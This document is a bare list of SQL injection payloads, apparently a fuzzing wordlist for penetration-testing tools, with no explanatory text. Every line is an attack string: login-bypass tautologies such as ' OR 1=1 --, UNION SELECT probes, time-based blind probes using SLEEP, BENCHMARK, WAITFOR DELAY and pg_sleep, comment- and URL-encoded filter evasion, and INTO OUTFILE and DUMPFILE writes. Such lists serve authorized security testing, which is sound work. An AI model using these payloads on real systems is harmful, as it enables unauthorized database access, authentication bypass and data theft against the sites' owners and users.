'
"
' OR 1=1 --
" OR 1=1 --
' OR '1'='1
" OR "1"="1
' UNION SELECT 1,2,3 --
" UNION SELECT 1,2,3 --
admin' --
admin" --
' AND 1=1 --
" AND 1=1 --
' AND 1=0 --
" AND 1=0 --
' OR 1=1#
" OR 1=1#
' OR '1'='1'#
" OR "1"="1"#
' UNION SELECT null,null,null --
" UNION SELECT null,null,null --
' AND SLEEP(5) --
" AND SLEEP(5) --
' AND BENCHMARK(1000000,MD5(1)) --
" AND BENCHMARK(1000000,MD5(1)) --
'; WAITFOR DELAY '0:0:5' --
"; WAITFOR DELAY '0:0:5' --
' OR pg_sleep(5) --
" OR pg_sleep(5) --
' OR 1=1 LIMIT 1 --
" OR 1=1 LIMIT 1 --
' OR 1=1-- -
" OR 1=1-- -
' OR 'a'='a
" OR "a"="a
') OR ('a'='a
") OR ("a"="a
' OR '1'='1' /*
" OR "1"="1" /*
' OR 1=1 /*
" OR 1=1 /*
' || '1'='1
" || "1"="1
' && '1'='1
" && "1"="1
' AND '1'='1
" AND "1"="1
' OR 1=1 AND 1=1
" OR 1=1 AND 1=1
' OR 1=1 AND 1=0
" OR 1=1 AND 1=0
' OR 1=0
" OR 1=0
' OR 1=1 -- -
" OR 1=1 -- -
' OR 1=1 --+
" OR 1=1 --+
' OR 1=1;--
" OR 1=1;--
' OR 1=1;
" OR 1=1;
' OR 1=1%00
" OR 1=1%00
' OR 1=1%23
" OR 1=1%23
' OR 1=1%2d%2d
" OR 1=1%2d%2d
' OR 1=1%2d%2d%20
" OR 1=1%2d%2d%20
' OR 1=1%2d%2d%20-
" OR 1=1%2d%2d%20-
' OR 1=1%2d%2d%2b
" OR 1=1%2d%2d%2b
' OR 1=1%2f%2a
" OR 1=1%2f%2a
' OR 1=1%2f%2a%2a%2f
" OR 1=1%2f%2a%2a%2f
' OR 1=1%7c%7c
" OR 1=1%7c%7c
' OR 1=1%26%26
" OR 1=1%26%26
' OR 1=1%20
" OR 1=1%20
' OR 1=1%09
" OR 1=1%09
' OR 1=1%0a
" OR 1=1%0a
' OR 1=1%0b
" OR 1=1%0b
' OR 1=1%0c
" OR 1=1%0c
' OR 1=1%0d
" OR 1=1%0d
' OR 1=1%a0
" OR 1=1%a0
' OR 1=1/**/
" OR 1=1/**/
' OR/**/1=1
" OR/**/1=1
'/**/OR/**/1=1
"/**/OR/**/1=1
'/**/OR/**/1=1/**/--
"/**/OR/**/1=1/**/--
'/**/OR/**/1=1/**/#
"/**/OR/**/1=1/**/#
'/**/OR/**/1=1/**/LIMIT/**/1
"/**/OR/**/1=1/**/LIMIT/**/1
'/**/OR/**/1=1/**/LIMIT/**/1/**/--
"/**/OR/**/1=1/**/LIMIT/**/1/**/--
'/**/OR/**/1=1/**/LIMIT/**/1/**/#
"/**/OR/**/1=1/**/LIMIT/**/1/**/#
'/**/OR/**/1=1/**/OFFSET/**/1
"/**/OR/**/1=1/**/OFFSET/**/1
'/**/OR/**/1=1/**/OFFSET/**/1/**/--
"/**/OR/**/1=1/**/OFFSET/**/1/**/--
'/**/OR/**/1=1/**/OFFSET/**/1/**/#
"/**/OR/**/1=1/**/OFFSET/**/1/**/#
'/**/OR/**/1=1/**/UNION/**/SELECT/**/1,2,3
"/**/OR/**/1=1/**/UNION/**/SELECT/**/1,2,3
'/**/OR/**/1=1/**/UNION/**/SELECT/**/1,2,3/**/--
"/**/OR/**/1=1/**/UNION/**/SELECT/**/1,2,3/**/--
'/**/OR/**/1=1/**/UNION/**/SELECT/**/1,2,3/**/#
"/**/OR/**/1=1/**/UNION/**/SELECT/**/1,2,3/**/#
'/**/OR/**/1=1/**/UNION/**/ALL/**/SELECT/**/1,2,3
"/**/OR/**/1=1/**/UNION/**/ALL/**/SELECT/**/1,2,3
'/**/OR/**/1=1/**/UNION/**/ALL/**/SELECT/**/1,2,3/**/--
"/**/OR/**/1=1/**/UNION/**/ALL/**/SELECT/**/1,2,3/**/--
'/**/OR/**/1=1/**/UNION/**/ALL/**/SELECT/**/1,2,3/**/#
"/**/OR/**/1=1/**/UNION/**/ALL/**/SELECT/**/1,2,3/**/#
'/**/OR/**/1=1/**/ORDER/**/BY/**/1
"/**/OR/**/1=1/**/ORDER/**/BY/**/1
'/**/OR/**/1=1/**/ORDER/**/BY/**/1/**/--
"/**/OR/**/1=1/**/ORDER/**/BY/**/1/**/--
'/**/OR/**/1=1/**/ORDER/**/BY/**/1/**/#
"/**/OR/**/1=1/**/ORDER/**/BY/**/1/**/#
'/**/OR/**/1=1/**/GROUP/**/BY/**/1
"/**/OR/**/1=1/**/GROUP/**/BY/**/1
'/**/OR/**/1=1/**/GROUP/**/BY/**/1/**/--
"/**/OR/**/1=1/**/GROUP/**/BY/**/1/**/--
'/**/OR/**/1=1/**/GROUP/**/BY/**/1/**/#
"/**/OR/**/1=1/**/GROUP/**/BY/**/1/**/#
'/**/OR/**/1=1/**/HAVING/**/1=1
"/**/OR/**/1=1/**/HAVING/**/1=1
'/**/OR/**/1=1/**/HAVING/**/1=1/**/--
"/**/OR/**/1=1/**/HAVING/**/1=1/**/--
'/**/OR/**/1=1/**/HAVING/**/1=1/**/#
"/**/OR/**/1=1/**/HAVING/**/1=1/**/#
'/**/OR/**/1=1/**/PROCEDURE/**/ANALYSE()
"/**/OR/**/1=1/**/PROCEDURE/**/ANALYSE()
'/**/OR/**/1=1/**/PROCEDURE/**/ANALYSE()/**/--
"/**/OR/**/1=1/**/PROCEDURE/**/ANALYSE()/**/--
'/**/OR/**/1=1/**/PROCEDURE/**/ANALYSE()/**/#
"/**/OR/**/1=1/**/PROCEDURE/**/ANALYSE()/**/#
'/**/OR/**/1=1/**/INTO/**/OUTFILE/**/'/tmp/test'
"/**/OR/**/1=1/**/INTO/**/OUTFILE/**/'/tmp/test'
'/**/OR/**/1=1/**/INTO/**/OUTFILE/**/'/tmp/test'/**/--
"/**/OR/**/1=1/**/INTO/**/OUTFILE/**/'/tmp/test'/**/--
'/**/OR/**/1=1/**/INTO/**/OUTFILE/**/'/tmp/test'/**/#
"/**/OR/**/1=1/**/INTO/**/OUTFILE/**/'/tmp/test'/**/#
'/**/OR/**/1=1/**/INTO/**/DUMPFILE/**/'/tmp/test'
"/**/OR/**/1=1/**/INTO/**/DUMPFILE/**/'/tmp/test'
'/**/OR/**/1=1/**/INTO/**/DUMPFILE/**/'/tmp/test'/**/--
"/**/OR/**/1=1/**/INTO/**/DUMPFILE/**/'/tmp/test'/**/--
'/**/OR/**/1=1/**/INTO/**/DUMPFILE/**/'/tmp/test'/**/#
"/**/OR/**/1=1/**/INTO/**/DUMPFILE/**/'/tmp/test'/**/#
